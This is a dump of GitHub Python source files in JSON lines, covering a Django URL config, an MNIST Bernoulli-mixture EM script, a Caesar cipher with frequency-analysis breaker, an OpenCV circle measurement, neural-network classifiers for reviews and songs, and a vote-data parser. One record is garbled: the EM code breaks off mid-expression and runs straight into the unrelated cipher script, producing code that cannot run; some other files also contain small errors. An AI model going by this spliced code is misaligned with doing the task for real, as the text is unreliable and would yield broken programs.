+{"seq_id":"1103000429","text":"\"\"\"app URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom drf_spectacular.views import (\n SpectacularAPIView,\n SpectacularSwaggerView,\n)\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n TokenVerifyView,\n)\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('api/schema/', SpectacularAPIView.as_view(), name='api-schema'),\n path('api/docs/',\n SpectacularSwaggerView.as_view(url_name='api-schema'),\n name='api-docs'),\n path('api/user/', include('user.urls')),\n path('api/forest/', include('forest.urls')),\n path('api/species/', include('species.urls')),\n path('api/reference/', include('reference.urls')),\n path('api/register/', include('register.urls')),\n path('api/register_picture/', include('register_picture.urls')),\n path('api/login/',\n TokenObtainPairView.as_view(),\n name='token_obtain_pair'),\n path('api/login/refresh/',\n TokenRefreshView.as_view(),\n name='token_refresh'),\n path('api/login/verify/',\n TokenVerifyView.as_view(),\n name='token_verify'),\n]\n","repo_name":"taniagmangolini/suceco-api","sub_path":"app/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"34030774035","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nfrom sklearn.datasets import fetch_openml\n\nmnist = fetch_openml(\"mnist_784\")\nmnist.data.shape\n'''\nMNIST data is in grey scale [0, 255].\nConvert it to a binary scale using a threshold of 128.\n'''\nmnist3 = (mnist.data/128).astype('int')\ndef pixel_convert(x):\n count = 0\n while x > 8 :\n count+=1\n x=x-8\n return count\n\ndef load_image_data(image_file):\n image = []\n image_for_discrete = []\n magic_number = image_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n images_number = image_file.read(4)\n images_number = int.from_bytes(images_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n rows_number = image_file.read(4)\n rows_number = int.from_bytes(rows_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n columns_number = image_file.read(4)\n columns_number = int.from_bytes(columns_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n for i in range(images_number):\n temp_image = []\n temp_image_for_discrete = []\n for j in range(rows_number*columns_number):\n data = image_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n data_for_discrete = convert_pixel(data)\n temp_image.append(data)\n temp_image_for_discrete.append(data_for_discrete)\n image.append(temp_image)\n image_for_discrete.append(temp_image_for_discrete)\n #print(image) \n return image ,image_for_discrete\n\ndef load_label_data(label_file):\n label = []\n magic_number = label_file.read(4)\n magic_number = int.from_bytes(magic_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n items_number = label_file.read(4)\n items_number = int.from_bytes(items_number, byteorder='big') # byteorder='big':輸入左邊bit為高位,右邊為低位\n \n for i in range(items_number):\n data = label_file.read(1)\n data = int.from_bytes(data, byteorder='big')\n label.append(data)\n return label \n\n\ndef print_test_image(image_list,label_list):\n data=open(\"output_image.txt\",'w+')\n data.write(\"Imagination of numbers in Bayesian classifier:\\n\")\n for i in range(len(image_list)):\n data.write(str(label_list[i])+\":\\n\")\n for j in range(28):\n for k in range(28):\n if image_list[i][k+28*j]<8:\n data.write(\"0\")\n else:\n data.write(\"1\") \n data.write(\"\\n\")\n data.write(\"\\n\")\n data.write(\"\\n\")\n return 0\n\ndef convert_pixel(x):\n if x > 127:\n return 1\n else:\n return 0\ndef show(image):\n '''\n Function to plot the MNIST data\n '''\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n imgplot = ax.imshow(image, cmap=plt.cm.Greys)\n imgplot.set_interpolation('nearest')\n ax.xaxis.set_ticks_position('top')\n ax.yaxis.set_ticks_position('left')\n plt.show()\n\ndef bernoulli(data, means):\n '''To compute the probability of x for each bernouli distribution\n data = N X D matrix\n means = K X D matrix\n prob (result) = N X K matrix \n '''\n N = len(data)\n K = len(means)\n #compute prob(x/mean)\n # prob[i, k] for ith data point, and kth cluster/mixture distribution\n prob = np.zeros((N, K))\n \n for i in range(N):\n for k in range(K):\n prob[i,k] = np.prod((means[k]**data[i])*((1-means[k])**(1-data[i])))\n \n return prob\n\ndef respBernoulli(data, weights, means):\n '''To compute responsibilities, or posterior probability p(z/x)\n data = N X D matrix\n weights = K dimensional vector\n means = K X D matrix\n prob or resp (result) = N X K matrix \n '''\n #step 1\n # calculate the p(x/means)\n prob = bernoulli(data, means)\n \n #step 2\n # calculate the numerator of the resp.s\n prob = prob*weights\n \n #step 3\n # calcualte the denominator of the resp.s\n row_sums = prob.sum(axis=1)[:, np.newaxis]\n \n # step 4\n # calculate the resp.s\n try:\n prob = prob/row_sums\n return prob\n except ZeroDivisionError:\n print(\"Division by zero occured in reponsibility calculations!\")\n \n \n\ndef bernoulliMStep(data, resp):\n '''Re-estimate the parameters using the current responsibilities\n data = N X D matrix\n resp = N X K matrix\n return revised weights (K vector) and means (K X D matrix)\n '''\n N = len(data)\n D = len(data[0])\n K = len(resp[0])\n \n Nk = np.sum(resp, axis=0)\n mus = np.empty((K,D))\n \n for k in range(K):\n mus[k] = np.sum(resp[:,k][:,np.newaxis]*data,axis=0) #sum is over N data points\n try:\n mus[k] = mus[k]/Nk[k] \n except ZeroDivisionError:\n print(\"Division by zero occured in Mixture of Bernoulli Dist M-Step!\")\n break \n \n return (Nk/N, mus)\n\ndef llBernoulli(data, weights, means):\n '''To compute expectation of the loglikelihood of Mixture of Beroullie distributions\n Since computing E(LL) requires computing responsibilities, this function does a double-duty\n to return responsibilities too\n '''\n N = len(data)\n K = len(means)\n \n resp = respBernoulli(data, weights, means)\n \n ll = 0\n for i in range(N):\n sumK = 0\n for k in range(K):\n try:\n temp1 = ((means[k]**data[i])*((1-means[k])**(1-data[i])))\n temp1 = np.log(temp1.clip(min=1e-50))\n \n except:\n print(\"Problem computing log(probability)\")\n sumK += resp[i, k]*(np.log(weights[k])+np.sum(temp1))\n ll += sumK\n \n return (ll, resp)\n\ndef mixOfBernoulliEM(data, init_weights, init_means, maxiters=1000, relgap=1e-4, verbose=False):\n '''EM algo fo Mixture of Bernoulli Distributions'''\n N = len(data)\n D = len(data[0])\n K = len(init_means)\n \n #initalize\n weights = init_weights[:]\n means = init_means[:]\n ll, resp = llBernoulli(data, weights, means)\n ll_old = ll\n \n for i in range(maxiters):\n if verbose and (i % 5 ==0):\n print(\"iteration {}:\".format(i))\n print(\" {}:\".format(weights))\n print(\" {:.6}\".format(ll))\n \n #E Step: calculate resps\n #Skip, rolled into log likelihood calc\n #For 0th step, done as part of initialization\n \n #M Step\n weights, means = bernoulliMStep(data, resp)\n \n #convergence check\n ll, resp = llBernoulli(data, weights, means)\n if np.abs(ll-ll_old) ord(\"z\"):\n encrypted += chr(ord(letter) + step - len(string.ascii_lowercase)).upper()\n else:\n encrypted += chr(ord(letter) + step).upper()\n encrypted_words.append(encrypted)\n \n return \" \".join(encrypted_words)\n\n\n# decrypt a message using a Caesars cipher \ndef caesars_decrypt(to_decrypt = str, \n step = int):\n \n \"\"\"\n Decrypts a message that was originally encrypted using Caesars cipher\n The steps can again be inputted in the function\n \"\"\"\n \n word_list = list(to_decrypt.split(\" \"))\n decrypted_words = []\n \n for word in word_list:\n decrypted = \"\"\n for letter in word:\n if letter not in string.ascii_uppercase:\n continue\n letter = letter.lower()\n if (ord(letter) - step) < ord(\"a\"):\n decrypted += chr(ord(letter) - step + len(string.ascii_lowercase))\n else:\n decrypted += chr(ord(letter) - step)\n decrypted_words.append(decrypted)\n \n return \" \".join(decrypted_words)\n \n\ndef break_caesar(message = str, \n most_frequent = \"e\"):\n \n \"\"\"\n Attempts to decode an encode message based on frequency analysis\n This function relies on the hypothesis that the letter 'e' is the most\n commonly used letter in strings\n \"\"\"\n \n highest_proportion = -1\n frequent_letter = \"\"\n \n # get the most frequent letter\n for letter in set(message):\n if message.count(letter) > highest_proportion:\n highest_proportion = message.count(letter)\n frequent_letter = letter\n \n # assume that this letter represents an \"e\"\n step = ord(frequent_letter.lower()) - ord(\"e\")\n \n return caesars_decrypt(to_decrypt = message, \n step = step)\n \n\n#%%\n \n# the string we start from\ntext = \"lorem ipsum dolor sit amet consectetur adipiscing elit sed do eiusmod tempor incididunt ut labore et dolore magna aliqua semper viverra nam libero justo laoreet sit amet cursus nibh ipsum consequat nisl vel pretium lectus condimentum id venenatis a condimentum vitae sapien elit eget gravida cum sociis natoque penatibus et in hendrerit gravida rutrum quisque pulvinar etiam non quam lacus aliquam faucibus purus in massa tempor nec feugiat nisl pretium blandit volutpat maecenas volutpat blandit aliquam etiam erat velit scelerisque in dictum non consectetur a sagittis orci a scelerisque purus semper at urna condimentum mattis pellentesque id nibh vitae purus faucibus ornare suspendisse libero justo laoreet sit amet cursus sit\"\n\nprint(\"\\n- - - -\\nOriginal message\\n- - - -\\n\")\nprint(text)\n\n# an example of the encryption process\nencrypted = caesars_encrypt(to_encrypt = text,\n step = 3)\nprint(\"\\n- - - -\\nEncrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(encrypted)\n\n# an example of the decryption process\ndecrypted = caesars_decrypt(to_decrypt = encrypted, \n step = 3)\nprint(\"\\n- - - -\\nDecrypted message using Caesar's cipher\\n- - - -\\n\")\nprint(decrypted)\n\n# show the code breaker\ndeciphered = break_caesar(message = encrypted.replace(\" \", \"\"))\nprint(\"\\n- - - -\\nDecrypted message using frequency analysis\\n- - - -\\n\")\nprint(deciphered)","repo_name":"shaista1519/Practice-of-computing-using-Python","sub_path":"Part 3/Chapter 07/Programming projects/project_04.py","file_name":"project_04.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"207130899","text":"# https://www.acmicpc.net/problem/5430\n\nfrom collections import deque\nimport sys\n\ninput = sys.stdin.readline\n\nt = int(input())\n\nfor _ in range(t):\n p = input().strip()\n n = int(input())\n arr = input().strip()\n if len(arr) == 2: # 빈 배열이 들어왔을 때\n arr = []\n else:\n arr = arr[1:-1].split(',')\n deq = deque(arr)\n \n rvs = False\n err = False\n \n for cmd in p:\n if cmd == 'R': # 배열의 순서 뒤집기\n rvs = False if rvs else True\n elif cmd == 'D': # 첫 번째 수 버리기\n if not deq:\n err = True\n break\n if rvs:\n deq.pop()\n else:\n deq.popleft()\n \n if err:\n print(\"error\")\n continue\n if rvs:\n deq.reverse()\n print(\"[\" + \",\".join(deq) + \"]\")","repo_name":"zero0205/Algorithm_Python","sub_path":"solved_class3/5430_AC.py","file_name":"5430_AC.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15731535153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 15 09:39:43 2017\n\n@author: mkeranen\n\nDiameter measurement work - need to optimize binarize, segment out main diameter\nCurrently finds largest contour in range and drops fits a circle in.\n\"\"\"\n\n# import the necessary packages\nfrom scipy.spatial import distance as dist\nfrom imutils import perspective\nfrom imutils import contours\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\n\ndef midpoint(ptA, ptB):\n\treturn ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)\n\n# load the image to process\nimage = cv2.imread('circles.png')\n\n#Resize img to fit computer screen better\nimage = cv2.resize(image, (int(image.shape[1]/4), int(image.shape[0]/4)))\n\n#Process image --> grayscale --> binarize --> Gaussian Blur\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nbinarized = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\ngrayblur = cv2.GaussianBlur(binarized[1], (7, 7), 0)\n\n##Uncomment to display previous 3 operations\n#cv2.imshow(\"Original Image\", image)\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Converted to Grayscale\", gray)\n#cv2.waitKey(0)\n#\n\n#cv2.imshow(\"Binarized\", binarized[1])\n#cv2.waitKey(0)\n#\n#cv2.imshow(\"Gaussian Blur\", grayblur)\n#cv2.waitKey(0)\n\n\n\n\nedgedCanny2 = cv2.Canny(grayblur, 50, 100)\n\nedgedDilate = cv2.dilate(edgedCanny2, None, iterations=1)\nedgedErode = cv2.erode(edgedDilate, None, iterations=1)\nimg = edgedCanny2.copy()\n#Show image operations\n#cv2.imshow(\"Canny Edge Detection - blur\", edgedCanny2)\n#cv2.waitKey(0)\n\n\n#Convert latest image back to color to allow colored contour lines\nimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n\n#Find contours on grayscale image\ncnts = cv2.findContours(edgedCanny2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\ncnts = cnts[1]\nnewCnts = []\ncircleList = []\n\n#Process contours by arc length and circle size\nfor c in cnts:\n circle = cv2.minEnclosingCircle(c)\n if cv2.arcLength(c,1)>100 and circle[1]>100:\n newCnts.append(c)\n circleList.append(circle)\n\n#Find max radius of circle enclosing the contours\nmaxRadius = 0\nfor radius in circleList:\n if radius[1] > maxRadius:\n maxRadius = radius[1]\n maxCenter = radius[0]\n\n#Draw the max bounding circle\nimg = cv2.circle(img.copy(), (int(maxCenter[0]),int(maxCenter[1])), int(maxRadius), (0,0,255), 3)\n#Draw contours on color image\nimg = cv2.drawContours(img.copy(), newCnts, -1, (0,255,0), 1)\n#Show contours\ncv2.imshow(\"Countour Plot\",img)\ncv2.waitKey(0)\n","repo_name":"mkeranen/CV_Diameter_Measurement","sub_path":"dia_msmt_mk.py","file_name":"dia_msmt_mk.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"44678310424","text":"import graphics\nimport math\n\nwin = graphics.GraphWin(\"Graphics Window\", 500, 500)\n\npt0 = graphics.Point(275, 250)\npt30 = graphics.Point(250 + 40 * math.cos(math.pi/6), 250 - 40 * math.sin(math.pi/6))\npt60 = graphics.Point(250 + 60 * math.cos(math.pi/3), 250 - 60 * math.sin(math.pi/3))\npt90 = graphics.Point(250, 200)\npt120 = graphics.Point(250 - (30 * math.cos(math.pi/3)), 250 - (30 * math.sin(math.pi/3)))\npt150 = graphics.Point(250, 250)\n\n\ncir = graphics.Circle(pt0, 5)\ncir2 = graphics.Circle(pt30, 5)\ncir3 = graphics.Circle(pt60, 5)\ncir4 = graphics.Circle(pt90, 5)\ncir5 = graphics.Circle(pt120, 5)\ncir6 = graphics.Circle(pt150, 5)\ncirEnc = graphics.Circle(graphics.Point(250, 250), 100)\n\nlineVert = graphics.Line(graphics.Point(250, 150), graphics.Point(250,350))\nlineHoriz = graphics.Line(graphics.Point(150, 250), graphics.Point(350, 250))\nline30 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 + 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 - (100 * math.sin(math.pi/6))))\nline60 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 + 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 - (100 * math.sin(math.pi/3))))\nline120 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/3)), (250 - 100 * (math.sin(math.pi/3)))), graphics.Point(250 + (100 * math.cos(math.pi/3)), 250 + (100 * math.sin(math.pi/3))))\nline150 = graphics.Line(graphics.Point(250 - (100 * math.cos(math.pi/6)), (250 - 100 * (math.sin(math.pi/6)))), graphics.Point(250 + (100 * math.cos(math.pi/6)), 250 + (100 * math.sin(math.pi/6))))\n\ncirEnc.draw(win)\ncir.draw(win)\ncir2.draw(win)\ncir3.draw(win)\ncir4.draw(win)\ncir5.draw(win)\ncir6.draw(win)\n\nlineVert.draw(win)\nlineHoriz.draw(win)\nline30.draw(win)\nline60.draw(win)\nline120.draw(win)\nline150.draw(win)\n\ndx = 0.1\ndy = -0.1\ndxDiag = 0.1 * math.sqrt(2) / 2\ndyDiag = 0.1 * math.sqrt(2) / 2\n\nwin.getMouse()\n\nwhile True:\n if cir.getCenter().getX() >= 350:\n dx = -0.1\n dy = 0.1\n dxDiag = 0.1 * math.sqrt(2) / 2\n dyDiag = 0.1 * math.sqrt(2) / 2\n if cir.getCenter().getX() <= 150:\n dx = -dx\n dy = -dy\n dxDiag = -dxDiag\n dyDiag = -dyDiag\n\n cir.move(dx, 0)\n cir2.move(-dx, 0)\n cir3.move(0, dy)\n cir4.move(0, -dy)\n cir5.move(dxDiag, dyDiag)\n cir6.move(-dxDiag, dyDiag)\n\n\n","repo_name":"crosenblatt/Python-Gifs","sub_path":"Circles.py","file_name":"Circles.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"25159912456","text":"import pandas as pd\n\nreviews = pd.read_csv(\"IMDB Dataset.csv\")\nreviews.head()\nreviews.shape\n# (50000, 2)\n\nimport re\nfrom sklearn.feature_extraction import text\n\nstop_words = text.ENGLISH_STOP_WORDS\n\ndef clean_review(review, stopwords):\n html_tag = re.compile('<.*?>')\n cleaned_review = re.sub(html_tag, \"\", review).split()\n cleaned_review = [i for i in cleaned_review if i not in stopwords]\n return \" \".join(cleaned_review)\n\n## before cleaning\ntext = reviews.review[0]\nprint(text[:200])\n# One of the other reviewers has mentioned that after watching just 1 Oz episode you'll be hooked. They are right, as this is exactly what happened with me. The first thing that struck me abo\n\n## after cleaning\ncleaned_text = clean_review(text, stop_words)\nprint(cleaned_text[:200])\n# One reviewers mentioned watching just 1 Oz episode you'll hooked. They right, exactly happened me.The thing struck Oz brutality unflinching scenes violence, set right word GO. Trust me, faint hearted\n\n## cleaning the review column\nreviews[\"cleaned_review\"] = reviews[\"review\"].apply(lambda x: clean_review(x, stop_words))\n\nfrom keras.preprocessing.text import Tokenizer\n\n## maximum words to keep based on frequency \nmax_features = 5000\n## replace out-of-vocab words with this\noov = \"OOV\"\ntokenizer = Tokenizer(num_words = max_features, oov_token = oov)\ntokenizer.fit_on_texts(reviews[\"cleaned_review\"])\n## convert text into integers\ntokenized = tokenizer.texts_to_sequences(reviews[\"cleaned_review\"])\n\nfrom sklearn.preprocessing import LabelEncoder\n\ndef sentiment_encode(df, column, le):\n le.fit(df[column])\n sentiment_le = le.transform(df[column])\n return sentiment_le, le\n\nle = LabelEncoder()\nsentiment_le, le = sentiment_encode(reviews, \"sentiment\", le)\nprint(len(le.classes_))\n# 2\nle.classes_\n# array(['negative', 'positive'], dtype=object)\n\nfrom keras.preprocessing import sequence\n\nmax_len = 500\nXtrain = sequence.pad_sequences(tokenized, maxlen = max_len)\n\nfrom sklearn.model_selection import train_test_split\n\n## we will do the splitting using a random state to ensure same splitting every time\nX_train, X_test, y_train, y_test = train_test_split(Xtrain, sentiment_le, \n test_size = .5,\n random_state = 13)\n \n## importing\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Dropout\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\n\n## model parameters\nvocab_size = max_features #5000\nembedding_dims = 128 # dimensions to which text will be represented\nnum_epochs = 3\nnoutput = len(le.classes_) #2 (binary)\n\n## model\nmodel = Sequential()\n# embedding layer (vocab_size is the total number of words in data,\n# then the embedding dimensions we specified, then the maximum length of one review)\nmodel.add(Embedding(vocab_size, embedding_dims, input_length = max_len))\n# CNN\nmodel.add(Conv1D(128, kernel_size = 4, input_shape = (vocab_size, embedding_dims),\n activation = \"relu\"))\n# max pooling layer\nmodel.add(MaxPooling1D(pool_size = 3))\n# bidirectional LSTM\nmodel.add(Bidirectional(LSTM(64, return_sequences = True)))\n# LSTM and droput\nmodel.add(LSTM(32, recurrent_dropout = 0.4))\nmodel.add(Dropout(0.2))\n# 1 neuron output layer and sigmoid activation (binary 0 or 1)\nmodel.add(Dense(noutput - 1, activation = \"sigmoid\"))\n# model summary and layout\nmodel.summary()\n\n# adam optimizer and binary crossentropy\nmodel.compile(loss = \"binary_crossentropy\", metrics = [\"accuracy\"],\n optimizer = \"adam\")\n\nmodel.fit(X_train, y_train, epochs = num_epochs,\n batch_size = 32,\n validation_data = (X_test[:1000], y_test[:1000]),\n verbose = 1)\n\nresults = model.evaluate(X_test[1000:], y_test[1000:])\n# 750/750 [==============================] - 51s 65ms/step - loss: 0.3550 - accuracy: 0.8637\nprint(\"test loss: %.2f\" % results[0])\n# test loss: 0.36\nprint(\"test accuracy: %.2f%%\" % (results[1] * 100))\n# test accuracy: 86.37%","repo_name":"MNoorFawi/sentiment-prediction-using-cnn-and-lstm-in-keras","sub_path":"full_code.py","file_name":"full_code.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"73443813872","text":"#Meload librari librosa yang digunakan untuk mfcc\nimport librosa \nimport librosa.feature #librosafeature adalah untuk meload feature dari librosa\nimport librosa.display #mengambil function display pada librosa\nimport glob #adalah modul pada python yang biasa digunakan meload segaala jenis format file salah satunya musik\nimport numpy as np #mengimport numpy sebagai np yang digunakan untuk arry musik\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation\nfrom keras.utils.np_utils import to_categorical\n\ndef display_mfcc(song): #function dengan impatn song\n y, _ = librosa.load(song) #variable y meload variable song\n mfcc = librosa.feature.mfcc(y) #feature mfcc untuk melakukan konversi audio menjadi bntuk vektor\n\n plt.figure(figsize=(10, 4))\n librosa.display.specshow(mfcc, x_axis='time', y_axis='mel')\n plt.colorbar()\n plt.title(song)\n plt.tight_layout()\n plt.show()\n\ndisplay_mfcc('lagu/viavallen/viavallen_wegahelangan.mp3') #memanggil fungsi display mfcc untuk ploating dari audio yang akan dituju\n\ndisplay_mfcc('lagu/tulus/tulus_adurayu.mp3')\n\ndef extract_features_song(f):\n y, _ = librosa.load(f)\n # get Mel-frequency cepstral coefficients\n mfcc = librosa.feature.mfcc(y)\n # normalize values between -1,1 (divide by max)\n mfcc /= np.amax(np.absolute(mfcc))\n return np.ndarray.flatten(mfcc)[25000:]\n\nextract_features_song('lagu/tulus/tulus_adurayu.mp3')\n\nextract_features_song('lagu/viavallen/viavallen_wegahelangan.mp3')\n\ndef generate_features_and_labels():\n all_features = [] #variabel all feature berisi array yang kosong\n all_labels = [] #variable all label berisi array yang kosong\n\n lagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien'] #variable lagu ini kita sesuaikan dengan nama folder yang ada di gdrive dan berisikan folder yang ada di dalamnya\n for singer in lagu:\n sound_files = glob.glob('lagu/'+singer+'/*.mp3') #mengambil file dari folder lagu dan mengambil semua file yang ada didalannya jga ekstensinya\n print('Processing %d songs by %s ...' % (len(sound_files), singer))\n \n for f in sound_files:\n features = extract_features_song(f)\n all_features.append(features)\n all_labels.append(singer)\n\n # convert labels to one-hot encoding\n label_uniq_ids, label_row_ids = np.unique(all_labels, return_inverse=True)\n label_row_ids = label_row_ids.astype(np.int32, copy=False)\n onehot_labels = to_categorical(label_row_ids, len(label_uniq_ids))\n return np.stack(all_features), onehot_labels\n\nfeatures, labels = generate_features_and_labels()\n\nprint(np.shape(features))\nprint(np.shape(labels))\n\ntraining_split = 0.8\n\nalldata = np.column_stack((features, labels))\n\nnp.random.shuffle(alldata)\nsplitidx = int(len(alldata) * training_split)\ntrain, test = alldata[:splitidx,:], alldata[splitidx:,:]\n\nprint(np.shape(train))\nprint(np.shape(test))\n\ntrain_input = train[:,:-10]\ntrain_labels = train[:,-10:]\n\ntest_input = test[:,:-10]\ntest_labels = test[:,-10:]\n\nprint(np.shape(train_input))\nprint(np.shape(train_labels))\n\nprint(np.shape(test_input))\nprint(np.shape(test_labels))\n\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(100, input_dim=np.shape(train_input)[1]))\nmodel.add(tf.keras.layers.Activation('relu'))\nmodel.add(tf.keras.layers.Dense(10))\nmodel.add(tf.keras.layers.Activation('softmax'))\nmodel.compile(optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nprint(model.summary())\n\nmodel.fit(train_input, train_labels, epochs=10, batch_size=32,\n validation_split=0.2)\n\nloss, acc = model.evaluate(test_input, test_labels, batch_size=32)\n\nprint(\"Done!\")\nprint(\"Loss: %.4f, accuracy: %.4f\" % (loss, acc))\n\n# save the trained model\nmodel.save(\"singers2.hdf5\")\n\nimport tensorflow as tf \nmodel2 = tf.keras.models.load\nprint(model2.summary())\n\ndef predict(song_path):\n song = np.stack([extract_features_song(song_path)])\n # do the prediction\n prediction = model2.predict(song, batch_size=32)\n\n print(\"Prediction: %s, confidence: %.2f\" % (np.argmax(prediction), np.max(prediction)))\n\npredict('Uts/lagu/tompi/Tompi - Balonku.mp3')\n\npredict('Uts/lagu/tulus/TULUS - Pamit.mp3')\n\nfrom sklearn.metrics import confusion_matrix\npred_labels = model2.predict(test_input)\ncm = confusion_matrix(test_labels.argmax(axis=1), pred_labels.argmax(axis=1))\ncm\n\nimport matplotlib.pyplot as plt\nimport itertools\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n plt.figure(figsize=(6,6), dpi=100)\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n #plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=90)\n plt.yticks(tick_marks, classes)\n \n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n #for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n # plt.text(j, i, format(cm[i, j], fmt),\n # horizontalalignment=\"center\",\n # color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\nimport numpy as np\n\nlagu = ['viavallen', 'tulus', 'tompi', 'rossa', 'ran', 'nikeardila', 'momoland', 'kotak', 'itzy', 'andien']\nplot_confusion_matrix(cm, classes=lagu, normalize=True)\nplt.show()","repo_name":"KecerdasanBuatan17/KB3C","sub_path":"uts/1174062/1174062.py","file_name":"1174062.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"4779525646","text":"from django.db import models\n\nclass Book(models.Model):\n title = models.CharField(max_length=200)\n date_publish= models.DateTimeField(default='')\n sammary=models.TextField(blank=True)\n country= models.TextField(blank=True)\n link = models.URLField(blank=True)\n Writer = models.ForeignKey(Writer,on_delete=models.CASCADE,default='')\n def __str__(self):\n return self.title\n\n\n\n class Meta:\n ordering =['title']\n","repo_name":"alaaalshamy/DjangoProject1","sub_path":"DjangoProject/liberary/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71680669551","text":"import pandas as pd\n\nfrom utils import Utils\n\n\nclass Parser(object):\n def __init__(self, data: dict, key1: str = '21', key2: str = '22'):\n self._key1 = key1\n self._key2 = key2\n self._data = data\n\n def parse(self):\n items = self._data['table'].items()\n\n region_data = []\n\n for key, value in items:\n obj = dict({})\n obj['code'] = key\n obj['region'] = Utils.get_region_name_by_code(key)\n obj['value1'] = value[self._key1]\n obj['value2'] = value[self._key2]\n\n region_data.append(obj)\n\n return {\n 'time_server': self._data['ts'],\n 'total_nolsatu': float(self._data['chart'][self._key1]),\n 'total_noldua': float(self._data['chart'][self._key2]),\n 'process_tps': float(self._data['progress']['proses']),\n 'total_tps': float(self._data['progress']['total']),\n 'votings': region_data\n }\n\n def parse_to_csv_format(self):\n items = self._data['table'].items()\n res = []\n\n for key, value in items:\n obj = dict({})\n obj[Utils.get_region_name_by_code(key)] = {\n 'code': key,\n 'value1': value[self._key1],\n 'value2': value[self._key2]\n }\n res.append(obj)\n\n return res\n","repo_name":"ebysofyan/pantau","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
